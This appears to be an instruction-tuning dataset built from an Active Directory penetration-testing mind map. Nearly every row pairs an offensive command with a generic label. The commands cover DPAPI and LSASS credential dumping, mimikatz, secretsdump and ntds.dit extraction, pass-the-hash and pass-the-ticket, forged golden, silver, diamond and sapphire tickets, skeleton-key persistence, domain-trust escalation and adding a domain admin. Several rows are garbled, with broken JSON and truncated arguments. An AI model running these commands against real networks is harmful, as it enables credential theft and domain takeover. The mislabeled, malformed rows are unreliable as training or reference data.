| instructionExtract credentials from DPAPIinputdonpapi <domain>/<user>:<password>@<target>outputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputdpapidump.py <domain>/<user>:<password>@<target>outputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputget masterkeyoutputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputmimikatz \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from DPAPIinputdploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>outputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputlsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeysoutputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputdploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>outputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputSharpDPAPI.exe triageoutputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputCrack users masterkeyoutputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputcopy c:\\users\\<user>\\AppData\\Roaming\\Microsoft\\Protect\\<SID>outputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputDPAPImk2john.py --preferred <prefered_file>outputTool or command referenced under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputDPAPImk2john.py -c domain -mk <masterkey> -S <sid> #DPAPImkoutputTool or command referenced under 'Extract credentials from DPAPI'. |
| instructionImpersonateinputImpersonateoutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputmsf> use incognito impersonate_token <domain>\\\\<user>outputTool or command referenced under 'Impersonate'. |
| instructionImpersonateinputnxc smb <ip> -u <localAdmin> -p <password> --loggedon-usersoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionImpersonateinputnxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionImpersonateinputirs.exe listoutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputirs.exe exec -p <pid> -c <command>outputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputImpersonate with adcsoutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputmasky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>outputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputImpersonate RDP SessionoutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputpsexec.exe -s -i cmdoutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputquery useroutputNote or procedural step under 'Impersonate'. |
| instructionImpersonateinputtscon.exe <id> /dest:<session_name> #RDPoutputNote or procedural step under 'Impersonate'. |
| instructionMiscinputFind UsersoutputNote or procedural step under 'Misc'. |
| instructionMiscinputsmbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csvoutputNote or procedural step under 'Misc'. |
| instructionMiscinputExtract KeepassoutputNote or procedural step under 'Misc'. |
| instructionMiscinputKeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dlloutputNote or procedural step under 'Misc'. |
| instructionMiscinputKeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target>outputNote or procedural step under 'Misc'. |
| instructionMiscinputHybrid (Azure AD-Connect)outputNote or procedural step under 'Misc'. |
| instructionMiscinputDump cleartext password of MSOL Account on ADConnect ServeroutputNote or procedural step under 'Misc'. |
| instructionMiscinputazuread_decrypt_msol_v2.ps1 #DCSYNCoutputNote or procedural step under 'Misc'. |
| instructionMiscinputnxc smb <ip> -u <user> -p <password> -M msol #DCSYNCoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionClear text PasswordinputInteractive-shell - psexecoutputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputpsexec.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputpsexec.exe -AcceptEULA \\\\<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputpsexecsvc.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text PasswordinputPseudo-shell (file write and read)outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputatexec.py <domain>/<user>:<password>@<ip> \outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputsmbexec.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputwmiexec.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputdcomexec.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputnxc smb <ip_range> -u <user> -p <password> -d <domain> -x <cmd>outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionClear text PasswordinputWinRMoutputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputevil-winrm -i <ip> -u <user> -p <password>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text PasswordinputEnter-PSSession -ComputerName <computer> -Credential <domain>\\<user>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputnxc winrm <ip_range> -u <user> -p <password> -d <domain> -x <cmd>outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionClear text PasswordinputRDPoutputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputxfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionClear text PasswordinputSMBoutputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputsmbclient.py <domain>/<user>:<password>@<ip>outputSMB client usage to list or access network shares. |
| instructionClear text Passwordinputsmbclient-ng.py -d <domain> -u <user> -p <password> --host <ip>outputSMB client usage to list or access network shares. |
| instructionClear text PasswordinputMSSQLoutputNote or procedural step under 'Clear text Password'. |
| instructionClear text Passwordinputnxc mssql <ip_range> -u <user> -p <password>outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionClear text Passwordinputmssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Clear text Password'. |
| instructionNT HashinputPass the HashoutputNote or procedural step under 'NT Hash'. |
| instructionNT Hashinputmimikatz \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionNT HashinputRDPoutputNote or procedural step under 'NT Hash'. |
| instructionNT Hashinputreg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\\System\\CurrentControlSet\\Control\\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'outputNote or procedural step under 'NT Hash'. |
| instructionNT HashinputWinRMoutputNote or procedural step under 'NT Hash'. |
| instructionNT Hashinputevil-winrm -i <ip> -u <user> -H <hash>outputNote or procedural step under 'NT Hash'. |
| instructionNT HashinputOverpass the Hash / Pass the key (PTK)outputNote or procedural step under 'NT Hash'. |
| instructionNT HashinputRubeus.exe asktgt /user:victim /rc4:<rc4value>outputTool or command referenced under 'NT Hash'. |
| instructionNT HashinputRubeus.exe ptt /ticket:<ticket>outputTool or command referenced under 'NT Hash'. |
| instructionNT HashinputRubeus.exe createnetonly /program:C:\\Windows\\System32\\[cmd.exe||upnpcont.exe]outputTool or command referenced under 'NT Hash'. |
| instructionNT HashinputgetTGT.py <domain>/<user> -hashes :<hashes>outputNote or procedural step under 'NT Hash'. |
| instructionNT HashinputgetTGT.py <domain>/<user> -hashes :<hashes>outputNote or procedural step under 'NT Hash'. |
| instructionKerberosinputPass the Ticket (ccache / kirbi)outputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputConvert FormatoutputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputticketConverter.py <kirbi||ccache> <ccache||kirbi>outputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputexport KRB5CCNAME=/root/impacket-examples/domain_ticket.ccacheoutputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputimpacket tools: Same as Pass the hash but use : -k and -no-pass for impacketoutputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputmimikatz kerberos::ptc \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionKerberosinputRubeus.exe ptt /ticket:<ticket>outputTool or command referenced under 'Kerberos'. |
| instructionKerberosinputproxychains secretsdump.py -k'<domain>'/'<user>'@'<ip>'outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionKerberosinputModify SPNoutputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputtgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice \ #pr 1256outputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputAeskeyoutputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputimpacket tools: Same as Pass the hash but use : -aesKey for impacket (and use FQDN)outputNote or procedural step under 'Kerberos'. |
| instructionKerberosinputproxychains secretsdump.py -aesKey <key> '<domain>'/'<user>'@'<ip>'outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionSocks (relay)inputproxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sidsoutputNote or procedural step under 'Socks (relay)'. |
| instructionSocks (relay)inputproxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-passoutputNote or procedural step under 'Socks (relay)'. |
| instructionSocks (relay)inputproxychains secretsdump.py -no-pass '<domain>'/'<user>'@'<ip>'outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionSocks (relay)inputproxychains smbclient.py -no-pass <user>@<ip>outputSMB client usage to list or access network shares. |
| instructionSocks (relay)inputproxychains atexec.py -no-pass <domain>/<user>@<ip> \outputNote or procedural step under 'Socks (relay)'. |
| instructionSocks (relay)inputproxychains smbexec.py -no-pass <domain>/<user>@<ip>outputNote or procedural step under 'Socks (relay)'. |
| instructionCertificate (pfx)inputunpac the hashoutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputcertipy auth -pfx <crt_file> -dc-ip <dc_ip>outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputgettgtpkinit.py -cert-pfx <crt.pfx> -pfx-pass <crt_pass> \ <tgt.ccache>outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputgetnthash.py -key '<AS-REP encryption key>' '<domain>'/'<dc_name>'outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputPass the certificateoutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputpkinitoutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputgettgtpkinit.py -cert-pfx \ ^[-pfx-pass \] \ \outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputRubeus.exe asktgt /user:\ /certificate:\ [/password:\] /domain:\ /dc:\ /showoutputTool or command referenced under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputcertipy auth -pfx <crt_file> -dc-ip <dc_ip>outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputschanneloutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputcertipy auth -pfx <pfx_file> -ldap-shelloutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputadd_computeroutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputSet RBCDoutputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputcertipy cert -pfx \ -nokey -out \outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputcertipy cert -pfx \ -nocert -out \outputNote or procedural step under 'Certificate (pfx)'. |
| instructionCertificate (pfx)inputpassthecert.py -action ldap-shell -crt <user.crt> -key <user.key> -domain <domain> -dc-ip <dc_ip>outputNote or procedural step under 'Certificate (pfx)'. |
| instructionMSSQLinputfind mssql accessoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputnxc mssql <ip> -u <user> -p <password> -d <domain>outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionMSSQLinputUsers or Computers with SQL adminoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputMATCH p=(u:Base)-[:SQLAdmin]->(c:Computer) RETURN poutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputMSSQLoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputmssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>outputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputenum_dboutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputenable_xp_cmdshelloutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputxp_cmdshell <cmd>outputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputenum_impersonateoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputexec_as_user <user>outputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputexec_as_login <login>outputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputxp_dir_tree <ip>outputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputCOERCE SMBoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputtrustlinkoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputsp_linkedserversoutputNote or procedural step under 'MSSQL'. |
| instructionMSSQLinputuse_linkoutputNote or procedural step under 'MSSQL'. |
| instructionDomain AdmininputDump ntds.ditoutputNote or procedural step under 'Domain Admin'. |
| instructionDomain Admininputnxc smb <dcip> -u <user> -p <password> -d <domain> --ntdsoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionDomain Admininputsecretsdump.py '<domain>/<user>:<pass>'@<ip>outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionDomain Admininputntdsutil \ \ \ q qoutputNote or procedural step under 'Domain Admin'. |
| instructionDomain Admininputsecretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extractoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionDomain Admininputmsf> windows/gather/credentials/domain_hashdumpoutputTool or command referenced under 'Domain Admin'. |
| instructionDomain Admininputmimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\\administratoroutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionDomain Admininputcertsync -u <user> -p '<password>' -d <domain> -dc-ip <dc_ip> -ns <name_server>outputNote or procedural step under 'Domain Admin'. |
| instructionGrab backup Keysinputdonpapi collect - H ':<hash>' <domain>/<user>@<ip_range> -t ALL --fetch-pvk #CredentialsoutputNote or procedural step under 'Grab backup Keys'. |
| instructionEnumerationinputnltest.exe /trusted_domainsoutputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinput([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()outputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputGet-DomainTrust -Domain <domain>outputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputGet-DomainTrustMappingoutputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> trustsoutputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputsharphound.exe -c trusts -d <domain>outputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputMATCH p=(:Domain)-[:TrustedBy]->(:Domain) RETURN poutputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputGet Domains SIDoutputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputGet-DomainSID -Domain <domain> Get-DomainSID -Domain <target_domain>outputNote or procedural step under 'Enumeration'. |
| instructionEnumerationinputlookupsid.py -domain-sids <domain>/<user>:<password>'@<dc> 0 lookupsid.py -domain-sids <domain>/<user>:<password>'@<target_dc> 0outputNote or procedural step under 'Enumeration'. |
| instructionChild->ParentinputTrust KeyoutputNote or procedural step under 'Child->Parent'. |
| instructionChild->Parentinputmimikatz lsadump::trust /patchoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionChild->Parentinputmimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbtgt /target:<target_domain> /pttoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionChild->Parentinputsecretsdump.py -just-dc-user '<parent_domain>$' <domain>/<user>:<password>@<dc_ip>outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionChild->Parentinputticketer.py -nthash <trust_key> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 -spn krbtgt/<parent_domain> trustfakeuseroutputNote or procedural step under 'Child->Parent'. |
| instructionChild->ParentinputGolden TicketoutputNote or procedural step under 'Child->Parent'. |
| instructionChild->Parentinputmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgtoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionChild->Parentinputmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /pttoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionChild->ParentinputraiseChild.py <child_domain>/<user>:<password>outputNote or procedural step under 'Child->Parent'. |
| instructionChild->Parentinputticketer.py -nthash <child_krbtgt_hash> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 goldenuseroutputNote or procedural step under 'Child->Parent'. |
| instructionChild->ParentinputUnconstrained delegationoutputNote or procedural step under 'Child->Parent'. |
| instructionChild->Parentinputcoerce parent_dc on child_dc domain #unconstrained delegationoutputNote or procedural step under 'Child->Parent'. |
| instructionParent->Childinputsame as Child to parentoutputNote or procedural step under 'Parent->Child'. |
| instructionExternal TrustinputDomainA <--> DomainB trust (B trust A, A trust B)outputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputfrom A to B FOREST_TRANSITIVEoutputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputpassword reuseoutputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputlat move (creds/pth/...)outputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputForeign group and usersoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputUsers with foreign Domain Group MembershipoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputMATCH p=(n:User {domain:\})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN poutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputGroup with foreign Domain Group MembershipoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputMATCH p=(n:Group {domain:\})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN poutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputSID History on BoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputGolden ticketoutputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgtoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExternal Trustinputmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /pttoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExternal Trustinputticketer.py -nthash <krbtgt> -domain-sid <domain_a> -domain <domain_a> -extra-sid <domain_b_sid>-<group_sid sup 1000> fakeuseroutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputTrust ticketoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputADCS abuseoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputUnconstrained delegationoutputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputcoerce dc_b on dc_a #Uncontrained Delegation (ADCS)outputNote or procedural step under 'External Trust'. |
| instructionExternal Trustinputfrom A to B is FOREST_TRANSITIVE|TREAT_AS_EXTERNALoutputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputDomainA <-- DomainB trust (B trust A / A access B)outputNote or procedural step under 'External Trust'. |
| instructionExternal TrustinputSame as double trust, but no unconstrained delegation as B can't connect to A", "output": "Note or procedural step under 'External Trust'."} |
| {"instruction": "External Trust", "input": "DomainA --> DomainB trust (A trust B / B access A)", "output": "Note or procedural step under 'External Trust'."} |
| {"instruction": "External Trust", "input": "password reuse #lat move (creds/pth/...)", "output": "Note or procedural step under 'External Trust'."} |
| {"instruction": "Mssql links", "input": "MSSQL trusted links doesn't care of trust linkoutputNote or procedural step under 'Mssql links'. |
| instructionMssql linksinputGet-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance>outputNote or procedural step under 'Mssql links'. |
| instructionMssql linksinputmssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Mssql links'. |
| instructionMssql linksinputtrustlinkoutputNote or procedural step under 'Mssql links'. |
| instructionMssql linksinputsp_linkedserversoutputNote or procedural step under 'Mssql links'. |
| instructionMssql linksinputuse_linkoutputNote or procedural step under 'Mssql links'. |
| instructionADD DAinputnet group \ myuser /add /domainoutputNote or procedural step under 'ADD DA'. |
| instructionGolden Ticketinputticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser>outputNote or procedural step under 'Golden Ticket'. |
| instructionGolden Ticketinputmimikatz \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionSilver Ticketinputmimikatz \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionSilver Ticketinputticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>outputNote or procedural step under 'Silver Ticket'. |
| instructionSilver TicketinputDirectory Service Restore Mode (DSRM)\\outputNote or procedural step under 'Silver Ticket'. |
| instructionSilver TicketinputPowerShell New-ItemProperty \ -Name \ -Value 2 -PropertyType DWORDoutputNote or procedural step under 'Silver Ticket'. |
| instructionSkeleton Keyinputmimikatz \ \ \ #password is mimikatzoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionCustom SSPinputmimikatz \ \ \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionCustom SSPinputC:\\Windows\\System32\\kiwissp.logoutputNote or procedural step under 'Custom SSP'. |
| instructionGolden certificateinputcertipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash>outputNote or procedural step under 'Golden certificate'. |
| instructionGolden certificateinputcertipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>", "output": "Note or procedural step under 'Golden certificate'."} |
| {"instruction": "Diamond ticket", "input": "ticketer.py -request -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> -user-id <user_id> -groups '512,513,518,519,520' <anyuser>", "output": "Note or procedural step under 'Diamond ticket'."} |
| {"instruction": "Saphire Ticket", "input": "ticketer.py -request -impersonate <anyuser> -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> 'ignored'", "output": "Note or procedural step under 'Saphire Ticket'."} |
| {"instruction": "Mind map reference", "input": "Scan Network", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Find DC IP", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Zone Transfer", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Anonymous & Guest access on SMB shares", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Enumerate LDAP:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Enumerate Users:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Bruteforce users:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Poisoning:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Coerce:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Unauthenticated PetitPotam (CVE-2022-26925)", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "PXE:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "no password", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "password protected", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "TimeRoasting:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Quick Compromise:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Zerologon (unsafe) CVE-2020-1472:", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "Eternal Blue MS17-010:", "output": "Reference to a known vulnerability or exploit; consult vendor advisories, patches, and mitigations."} |
| {"instruction": "Mind map reference", "input": "Tomcat/Jboss Manager:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Java RMI:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Java Serialiszed port:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Log4shell:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Database:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Exchange:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Veeam:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "GLPI:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Weak websites / services:", "output": "Category or heading in the mind map indicating a class of techniques (not a specific command)."} |
| {"instruction": "Mind map reference", "input": "Valid user (no password)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Password Spray", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "ASREPRoast", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Blind Kerberoasting", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "Man in The Middle (Listen and Relay)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Listen", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "NTLM relay", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "To LDAP(S)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "To SMB", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "TO HTTP", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "To MsSQL", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "SMB -> NETLOGON", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "SMB -> SMB", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "SMB -> LDAP(S)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Crack Hash", "output": "Section heading from the mind map, representing a phase or grouping."} |
| {"instruction": "Mind map reference", "input": "LM (299bd128c1101fd6)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "NT (b4b9b02e6f09a9bd760...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "NTLMv1 (user::85D5BC...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "NTLMv2 (user::N46iSNek...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Kerberos 5 TGS ($krb5tgs$23$...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Kerberos 5 TGS AES128", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "($krb5tgs$17...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "Kerberos ASREP ($krb5asrep$23...)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "MSCache 2 (very slow)", "output": "Reference or note from the mind map without a specific command."} |
| {"instruction": "Mind map reference", "input": "($DCC2$10240...)", "output": "Reference or note from the mind map without a specific command."} |
